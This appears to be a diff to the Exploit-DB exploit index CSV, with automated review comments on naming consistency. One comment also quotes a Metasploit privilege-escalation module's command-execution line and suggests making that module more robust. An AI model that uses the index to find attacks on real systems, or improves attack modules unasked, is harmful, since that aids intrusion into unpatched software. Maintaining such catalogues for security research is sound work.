Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
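Review bot: `execute_exploit` interpolates `exploit_path` and `payload_path` unquoted into `cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")`, and both derive from the user-supplied `PATH` option (or `%TEMP%`), so a directory containing a space splits the command line and the exploit binary receives the wrong argument; quote them as `"/c \"#{exploit_path}\" \"#{payload_path}\""`. `validate_active_host` assigns `host = session.session_host` and never uses it, which reads as a leftover; either drop the local or include it in the status message. The `rescue` in `exploit` only handles `Rex::Post::Meterpreter::RequestError`, so any other error raised by `upload_file`, `write_file` or `cmd_exec` propagates without being logged through `elog`; broadening that clause, or adding a second `rescue ::Exception` that logs and re-raises, would keep the failure diagnosable. The Description contains the typos `kerneles` and `excpetions`, and its last sentence says the payload is run "in order to gain remote code execution" although this is an `Msf::Exploit::Local` privilege-elevation module; `in order to gain elevated privileges` matches the module name.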
@@ -9812,6 +9813,7 @@ id,file,description,date,author,type,platform,port
 44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
 44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
 45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
+45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16608,11 +16610,15 @@ id,file,description,date,author,type,platform,port
 44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows,
 44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows,
 44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081
-44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
+44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070
 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php,
 45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64,
 45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux,
-45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
+45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443
+45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181
+45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984
+45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80
+45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -26049,7 +26055,7 @@ id,file,description,date,author,type,platform,port
 18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",webapps,php,
 18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,webapps,php,
 18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple,
-18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
+18480,exploits/php/webapps/18480.txt,"Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php,
 18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",webapps,php,
 18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",webapps,hardware,
 18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,
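Review bot: The added 45025 row keeps `Unauthenticated` in its description (`"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)"`) while the same hunk strips that word from the 44992 and 45005 descriptions, so the commit applies its own naming rule inconsistently. Either drop it here as well, `"Hadoop YARN ResourceManager - Command Execution (Metasploit)"`, or keep it on all three rows. The added 45018 row also spells the vendor as `Manage Engine`, whereas the 44975 row touched later in this commit (hunk `@@ -39634,12 +39640,13 @@`) uses `ManageEngine`; one spelling should be used so searches over the index find both entries.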
@@ -26149,7 +26155,7 @@ id,file,description,date,author,type,platform,port
 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,
 18722,exploits/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",webapps,cgi,
 18724,exploits/php/webapps/18724.rb,"Dolibarr ERP/CRM 3 - (Authenticated) OS Command Injection (Metasploit)",2012-04-09,Metasploit,webapps,php,
-18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
+18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,
 18728,exploits/php/webapps/18728.txt,"Joomla! Component Estate Agent - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
 18729,exploits/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,webapps,php,
 18732,exploits/php/webapps/18732.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection (2)",2012-04-12,"hordcode security",webapps,php,
@@ -30956,7 +30962,7 @@ id,file,description,date,author,type,platform,port
 28965,exploits/php/webapps/28965.txt,"Bitweaver 1.x - '/wiki/list_pages.php?sort_mode' SQL Injection",2006-11-10,"laurent gaffie",webapps,php,
 28967,exploits/php/webapps/28967.txt,"ExoPHPDesk 1.2 - 'Pipe.php' Remote File Inclusion",2006-11-11,Firewall1954,webapps,php,
 28970,exploits/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - (Authenticated) Persistent Cross-Site Scripting",2013-10-15,TheXero,webapps,php,80
-28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
+28971,exploits/php/webapps/28971.py,"Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection",2013-10-15,drone,webapps,php,80
 28972,exploits/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",webapps,unix,
 28975,exploits/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,webapps,ios,
 28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios,
@@ -34015,7 +34021,7 @@ id,file,description,date,author,type,platform,port
 34004,exploits/php/webapps/34004.txt,"Joomla! Component Percha Fields Attach 1.0 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
 34005,exploits/php/webapps/34005.txt,"Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
 34006,exploits/php/webapps/34006.txt,"Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Traversal Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
-34007,exploits/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
+34007,exploits/php/webapps/34007.txt,"Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities",2014-07-08,"Deepak Rathore",webapps,php,
 34008,exploits/php/webapps/34008.txt,"Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Arbitrary File Access",2010-05-19,AntiSecurity,webapps,php,
 34011,exploits/php/webapps/34011.txt,"Shopzilla Affiliate Script PHP - 'search.php' Cross-Site Scripting",2010-05-19,"Andrea Bocchetti",webapps,php,
 34012,exploits/php/webapps/34012.txt,"Caucho Resin Professional 3.1.5 - '/resin-admin/digest.php' Multiple Cross-Site Scripting Vulnerabilities",2010-05-19,xuanmumu,webapps,php,
@@ -35052,7 +35058,7 @@ id,file,description,date,author,type,platform,port
 35648,exploits/php/webapps/35648.txt,"ZenPhoto 1.4.0.3 - '_zp_themeroot' Multiple Cross-Site Scripting Vulnerabilities",2011-04-21,"High-Tech Bridge SA",webapps,php,
 35649,exploits/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
 35650,exploits/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie SQL Injection",2011-04-21,"AutoSec Tools",webapps,php,
-35651,exploits/php/webapps/35651.txt,"Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
+35651,exploits/php/webapps/35651.txt,"Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting",2011-04-22,"AutoSec Tools",webapps,php,
 35657,exploits/php/webapps/35657.php,"WordPress Plugin Sermon Browser 0.43 - Cross-Site Scripting / SQL Injection",2011-04-26,Ma3sTr0-Dz,webapps,php,
 35655,exploits/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Cross-Site Scripting",2011-04-25,"AutoSec Tools",webapps,php,
 35662,exploits/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",webapps,php,
@@ -35476,9 +35482,9 @@ id,file,description,date,author,type,platform,port
 36328,exploits/php/webapps/36328.txt,"TA.CMS (TeachArabia) - 'index.php?id' SQL Injection",2011-11-22,CoBRa_21,webapps,php,
 36329,exploits/php/webapps/36329.txt,"TA.CMS (TeachArabia) - 'lang' Traversal Local File Inclusion",2011-11-22,CoBRa_21,webapps,php,
 36330,exploits/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",webapps,php,
-36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
-36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
-36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
+36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
+36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
+36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
 36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
 36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
 36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
@@ -35715,7 +35721,7 @@ id,file,description,date,author,type,platform,port
 36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80
 36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80
 36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
-36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
+36683,exploits/php/webapps/36683.txt,"Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
 36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java,
 36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php,
 36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php,
@@ -35831,7 +35837,7 @@ id,file,description,date,author,type,platform,port
 36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,webapps,hardware,
 36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,webapps,php,
 36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",webapps,php,
-36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
+36873,exploits/php/webapps/36873.txt,"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
 36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,
 36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,
 36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,webapps,php,
@@ -39554,7 +39560,7 @@ id,file,description,date,author,type,platform,port
 44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
 44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
 44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
-44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
+44805,exploits/php/webapps/44805.txt,"Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection",2018-05-30,Sysdream,webapps,php,80
 44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
 44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
 44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
@@ -39634,12 +39640,13 @@ id,file,description,date,author,type,platform,port
 44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
 44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
 44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
-44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
+44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
 44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
-44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
+44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
+45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80
 44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
 44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
 44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
@@ -39650,3 +39657,6 @@ id,file,description,date,author,type,platform,port
 45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
 45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
 45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
+45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
+45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
+45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,